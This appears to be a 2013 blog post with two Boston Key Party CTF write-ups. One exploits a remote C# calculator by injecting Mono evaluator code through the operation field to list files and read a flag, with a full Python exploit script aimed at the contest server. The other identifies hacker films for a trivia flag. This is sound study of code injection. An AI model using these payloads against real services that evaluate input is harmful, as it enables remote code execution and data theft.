Monday, June 10, 2013

Boston Key Party CTF 2013 - Wolfram Beta writeup

We have a simple remote calculator on 54.218.12.97:34567, that listens number1, operation and number2.
Trying to send some values and symbols to check it.
If number1 and number2 values are not numbers, then calculator sends a message: Hey, numbers only. This is just a calculator.
But operation value may consist of any symbols. My try to inject "+123+"  in operation value was successfull.
Then I've understand, that calculator is used Mono.CSharp.Evaluator.Evaluate method. Here is the exception message.
Unhandled Exception: System.ArgumentException: The expression did not set a result    
at Mono.CSharp.Evaluator.Evaluate (System.String input) [0x00000] in :0     
at wolfram_beta.MainClass.ReplCalculator () [0x00000] in :0     
at wolfram_beta.MainClass.Main (System.String[] args) [0x00000] in :0   
[ERROR] FATAL UNHANDLED EXCEPTION: 
System.ArgumentException: The expression did not set a result    
at Mono.CSharp.Evaluator.Evaluate (System.String input) [0x00000] in :0     
at wolfram_beta.MainClass.ReplCalculator () [0x00000] in :0     
at wolfram_beta.MainClass.Main (System.String[] args) [0x00000] in :0

Trying to get files in current directory to find a "flag" file, using the next injection in operation value.
op = '==1; foreach (var dir in System.IO.Directory.GetFiles(System.IO.Directory.GetCurrentDirectory())) System.Console.WriteLine(dir); 31337+'
Awesome! Flag file is found :)
/home/wbeta/flag
Now just need to read it.
Here is full exploit code: 
import time
import socket
 
s = socket.socket()
s.connect(("54.218.12.97", 34567))
 
# receive calculator info
data = s.recv(1024)
print data
data = s.recv(1024)
print data
 
# set numbers and operation
n1 = '0'
n2 = '0'
op = '==1; System.Console.WriteLine(System.IO.File.ReadAllText("/home/wbeta/flag")); 31337+'
 
# send nums and op
s.send(n1 + '\n')
 
data = s.recv(1024)
print data 
s.send(op + '\n')
data = s.recv(1024)
print data 
s.send(n2 + '\n')
data = s.recv(1024)
print data
data = s.recv(1024)
 
# thinking...
while 'Done Thinking!' not in data:
 data = s.recv(1024)
 print data,
 
# receive result
data = s.recv(1024)
print data 

Done! Flag is received: at_least_its_not_a_python_jail
It's not a python jail :)

Boston Key Party CTF 2013 - Mystery writeup

A list of links, and code is given. Need to found from what movies each of these parts.
After some search, I've found all of them and got the list of movies. It's really good. :) Here it is:
The Social Network
Tron Legacy
Judge Dredd
The Girl with the Dragon Tattoo
Jurassic Park
Minority Report
Sneakers
Hackers
So a flag is wargames.